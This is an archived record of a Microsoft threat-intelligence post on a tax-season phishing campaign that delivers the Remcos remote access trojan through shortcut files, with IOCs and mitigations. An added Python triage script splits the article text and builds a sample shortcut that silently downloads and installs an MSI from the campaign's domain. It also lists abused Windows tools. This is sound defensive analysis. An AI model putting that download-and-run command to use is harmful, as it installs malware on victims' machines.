{
	"id": "bee70e5f-64c4-495b-99ad-d7087a32d9ec",
	"created_at": "2026-04-10T03:21:15.702854Z",
	"updated_at": "2026-04-10T03:22:17.071375Z",
	"deleted_at": null,
	"sha1_hash": "1f709b0bac4c1e010347943f1e0679bc2d40409e",
	"title": "Threat actors strive to cause Tax Day headaches",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 217105,
	"plain_text": "Threat actors strive to cause Tax Day headaches\r\nBy Microsoft Threat Intelligence\r\nPublished: 2023-04-13 · Archived: 2026-04-10 02:25:39 UTC\r\nThreat actors often take advantage of current events and major news headlines to align attacks and leverage social\r\nengineering when people could be more likely to be distracted or misled. Tax season is particularly appealing to\r\nthreat actors because not only are people busy and under stress, but it is intrinsically tied to financial information.\r\nWith U.S. Tax Day approaching, Microsoft has observed phishing attacks targeting accounting and tax return\r\npreparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in\r\nFebruary of this year.\r\nRemcos, which stands for “Remote Control and Surveillance”, is a closed-source tool that allows threat actors to\r\ngain administrator privileges on Windows systems remotely. It was released in 2016 by BreakingSecurity, a\r\nEuropean company that markets Remcos and other offensive security tools as legitimate software. CISA’s 2021 Top\r\nMalware Strains advisory listed Remcos among that year’s top malware strains, citing its use in mass phishing attacks\r\nusing COVID-19 pandemic themes targeting businesses and individuals.\r\nWhile social engineering lures like this one are common around Tax Day and other high-profile current events, these\r\ncampaigns are specific and targeted in a way that is uncommon. The targets for this threat are exclusively\r\norganizations that deal with tax preparation, financial services, CPA and accounting firms, and professional\r\nservice firms dealing in bookkeeping and tax. This campaign can be detected in Microsoft Defender Antivirus,\r\nbuilt into Windows and on by default, as well as Microsoft 365 Defender.\r\nThe campaign uses lures masquerading as tax documentation sent by a client, while the link in the email uses a\r\nlegitimate click-tracking service to evade detection. 
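The following Python script is an added example, not code from Microsoft or from the blog post. It works the shortcut stage of the chain this page describes: it reads the StringData of a Windows shortcut (the MS-SHLLINK format), pulls any URLs out of the embedded command line, flags interpreters and installers a tax document has no business launching, and checks the URL hosts and the file hash against the indicators listed at the end of the post. The sample shortcut, the build_lnk helper, the parse_lnk_strings and triage_lnk names and the LOLBIN watch list are assumptions made for this example; the indicator values are the page's own, kept defanged in the source and never fetched.

```python
import hashlib
import struct
from urllib.parse import urlsplit

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which structures follow the 76-byte header.
FLAG_ID_LIST, FLAG_LINK_INFO, FLAG_UNICODE = 0x01, 0x02, 0x80
# StringData fields in the fixed order they appear when their LinkFlags bit is set.
STRING_FIELDS = (('name', 0x04), ('relative_path', 0x08), ('working_dir', 0x10),
                 ('arguments', 0x20), ('icon_location', 0x40))
STRING_FLAG = dict(STRING_FIELDS)
LNK_CLSID = bytes.fromhex('0114020000000000c000000000000046')

# Indicators as published in the blog post, kept defanged; nothing here is ever fetched.
IOC_DOMAINS = {'uymm[.]org'}
IOC_URL = 'https[:]//uymm[.]org/roman.msi'
IOC_SHA256 = {'23597910ec60cf8b97144447c5cddd2e657d09e2f2008d53a3834b6058f36a41',
              '95a2d34db66ce4507d05ac33bea3bdc054860d9d97e91bdc2ce7ce689ae06e9f',
              'ac55905e6f5a2ab166f9a2ea7d1f4f68f5660f39b5c28b7746df1e9db6dd4430'}
# Hypothetical watch list: interpreters and installers a tax document should never launch.
LOLBINS = ('powershell', 'pwsh', 'cmd.exe', 'mshta', 'wscript', 'cscript', 'msiexec',
           'rundll32', 'regsvr32', 'certutil', 'bitsadmin')

def refang(ioc):
    return ioc.replace('[.]', '.').replace('[:]', ':').replace('hxxp', 'http').lower()

def is_shell_link(data):
    return len(data) >= 0x4C and data[:4] == bytes.fromhex('4c000000') and data[4:20] == LNK_CLSID

def parse_lnk_strings(data):
    '''Return the StringData of a .LNK as a dict; IDList and LinkInfo are skipped via
    their own size fields and any trailing ExtraData is ignored.'''
    if not is_shell_link(data):
        raise ValueError('not a shell link (HeaderSize/CLSID mismatch)')
    flags = struct.unpack_from('<I', data, 0x14)[0]
    pos = 0x4C
    if flags & FLAG_ID_LIST:
        pos += 2 + struct.unpack_from('<H', data, pos)[0]   # IDListSize excludes itself
    if flags & FLAG_LINK_INFO:
        pos += struct.unpack_from('<I', data, pos)[0]       # LinkInfoSize includes itself
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from('<H', data, pos)[0]      # CountCharacters, not bytes
        pos += 2
        if flags & FLAG_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode('utf-16-le')
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode('cp1252', errors='replace')
            pos += count
    return fields

def extract_urls(text):
    # Quotes (chr 34 and 39) become separators so quoted URLs are still isolated as tokens.
    urls = []
    for token in text.replace(chr(34), ' ').replace(chr(39), ' ').split():
        if token.lower().startswith(('http://', 'https://')):
            urls.append(token.rstrip(',;)'))
    return urls

def triage_lnk(data):
    '''Parse a shortcut and check it against the page IOCs and the LOLBIN watch list.'''
    fields = parse_lnk_strings(data)
    blob = ' '.join(fields.values())
    urls = extract_urls(blob)
    hosts = {urlsplit(u).hostname for u in urls} - {None}
    ioc_hosts = {refang(d) for d in IOC_DOMAINS}
    hits = {h for h in hosts if h in ioc_hosts or any(h.endswith('.' + d) for d in ioc_hosts)}
    return {'fields': fields, 'urls': urls, 'ioc_domain_hits': sorted(hits),
            'lolbins': sorted(b for b in LOLBINS if b in blob.lower()),
            'sha256_hit': hashlib.sha256(data).hexdigest() in IOC_SHA256}

def build_lnk(arguments, relative_path=None):
    '''Build a minimal Unicode .LNK (constructed sample): empty IDList, zero-filled
    minimum-size LinkInfo, then the requested StringData fields.'''
    flags = FLAG_UNICODE | FLAG_ID_LIST | FLAG_LINK_INFO | STRING_FLAG['arguments']
    strings = [arguments]
    if relative_path is not None:
        flags |= STRING_FLAG['relative_path']
        strings.insert(0, relative_path)            # RELATIVE_PATH precedes ARGUMENTS
    header = bytearray(0x4C)
    struct.pack_into('<I', header, 0, 0x4C)
    header[4:20] = LNK_CLSID
    struct.pack_into('<I', header, 0x14, flags)
    body = struct.pack('<H', 2) + bytes(2)          # IDList holding only a TerminalID
    body += struct.pack('<I', 0x1C) + bytes(0x18)   # LinkInfo of the minimum 0x1C bytes
    for s in strings:
        body += struct.pack('<H', len(s)) + s.encode('utf-16-le')
    return bytes(header) + body

# Constructed sample: a shortcut whose target is cmd.exe and whose arguments launch PowerShell to
# fetch the MSI named in the IOCs. chr(92) is a backslash, used so the sample has no escapes.
SEP = chr(92)
SAMPLE_ARGS = ('/c powershell -w hidden -c iwr ' + refang(IOC_URL)
               + ' -OutFile roman.msi; msiexec /qn /i roman.msi')
SAMPLE_LNK = build_lnk(SAMPLE_ARGS, SEP.join(['..', '..', 'Windows', 'System32', 'cmd.exe']))
```

To run it on a real shortcut, pass the bytes of the file to triage_lnk. Two caveats: many malicious shortcuts store their launcher only in the LinkTargetIDList (no RELATIVE_PATH), which this parser skips rather than decodes, so an empty result is inconclusive rather than clean; and the URL extraction is deliberately simple, so a command line that builds the URL from concatenated fragments or an encoded PowerShell block will show up only through the LOLBIN hit, not the IOC match.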
The target is then redirected to a legitimate file hosting site,\r\nwhere the actor has uploaded Windows shortcut (.LNK) files.\r\nhttps://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/\r\nPage 1 of 5\n\nFigure 1. Remcos malware phishing lure\r\nThese LNK files generate web requests to actor-controlled domains and/or IP addresses to download malicious\r\nfiles. These malicious files then perform actions on the target device and download the Remcos payload,\r\nproviding the actor potential access to the target device and network.\r\nMicrosoft is sharing this information along with detections and recommendations with the community to help\r\nusers and defenders stay vigilant against this campaign with Tax Day approaching in the U.S. on April 18.\r\nMicrosoft 365 Defender and Microsoft Defender Antivirus detect and block Remcos and other malicious activity\r\nrelated to this campaign.\r\nPhishing campaign analysis\r\nThe link in the phishing email points to the Amazon Web Services click-tracking service at awstrack[.]me. That\r\nlink redirects the target to a ZIP file hosted on the legitimate file-sharing service spaces[.]hightail[.]com. The\r\nZIP file contains LNK files, Windows shortcuts that point to other files. The LNK files make web requests to\r\nactor-controlled domains and IP addresses to download additional malicious files such as MSI files containing\r\nDLLs or executables, VBScript files containing PowerShell commands, or deceptive PDFs.\r\nFigure 2. 
Unpacked file names referencing tax documents in the malware\r\nIn some cases, GuLoader was used to execute shellcode and subsequently download Remcos on the target system.\r\nGuLoader is a malicious downloader that has been used by many different actors to deliver a wide variety of\r\nmalware, including several RATs such as Remcos, through phishing campaigns since it was first observed in the\r\nwild in December 2019. The downloader evades analysis and detection by storing and delivering its payloads on\r\nlegitimate file-sharing sites and cloud hosting services and by encrypting and obfuscating the GuLoader shellcode\r\nand payloads.\r\nSuccessful delivery of a Remcos payload could give an attacker control of the target device to steal\r\ninformation and/or move laterally through the target network.\r\nFigure 3. Tax Day-themed Remcos attack chain\r\nWe continue to learn from these campaigns to improve how we protect customers.\r\nRecommendations and detections\r\nMicrosoft recommends the following mitigations (attack surface reduction rules and Microsoft Defender Antivirus\r\nsettings) to reduce the impact of this threat:\r\nBlock JavaScript or VBScript from launching downloaded executable content\r\nBlock executable files from running unless they meet a prevalence, age, or trusted list criterion\r\nEnable Microsoft Defender Antivirus scanning of downloaded files and attachments\r\nEnable Microsoft Defender Antivirus real-time behavior monitoring\r\nEnable cloud-delivered protection\r\nDetection details\r\nMicrosoft Defender for Office 365\r\nMicrosoft Defender for Office 365 detects phishing emails associated with the campaign discussed in this blog.\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus, on by default on Windows machines, detects threat components as the following\r\nmalware:\r\nBackdoor:Win32/Remcos.GA!MTB\r\nMicrosoft 
Defender for Endpoint\r\nAlerts with the following titles in the security center can indicate threat activity on your network:\r\n‘Remcos’ backdoor\r\nSuspicious ‘Remcos’ behavior\r\n‘Remcos’ malware\r\n‘Guloader’ malware\r\nMicrosoft Sentinel\r\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with “TI map”) to\r\nautomatically match the indicators mentioned in this blog post with data in their workspace. If the TI Map\r\nanalytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft\r\nSentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content\r\nHub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy\r\nIndicators of compromise (IOCs)\r\nDomain:\r\nuymm[.]org\r\nURL:\r\nhttps[:]//uymm[.]org/roman.msi\r\nSHA-256 hashes:\r\n23597910ec60cf8b97144447c5cddd2e657d09e2f2008d53a3834b6058f36a41\r\n95a2d34db66ce4507d05ac33bea3bdc054860d9d97e91bdc2ce7ce689ae06e9f\r\nac55905e6f5a2ab166f9a2ea7d1f4f68f5660f39b5c28b7746df1e9db6dd4430\r\nReferences:\r\n2021 Top Malware Strains | Cybersecurity and Infrastructure Security Agency (CISA)\r\nGuLoader: A Popular New VB6 Downloader that Abuses Cloud Services | Proofpoint US\r\nGuLoader: Peering Into a Shellcode-based Downloader | CrowdStrike",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/"
	],
	"report_names": [
		"threat-actors-strive-to-cause-tax-day-headaches"
	],
	"threat_actors": [],
	"ts_created_at": 1775791275,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1f709b0bac4c1e010347943f1e0679bc2d40409e.pdf",
		"text": "https://archive.orkl.eu/1f709b0bac4c1e010347943f1e0679bc2d40409e.txt",
		"img": "https://archive.orkl.eu/1f709b0bac4c1e010347943f1e0679bc2d40409e.jpg"
	}
}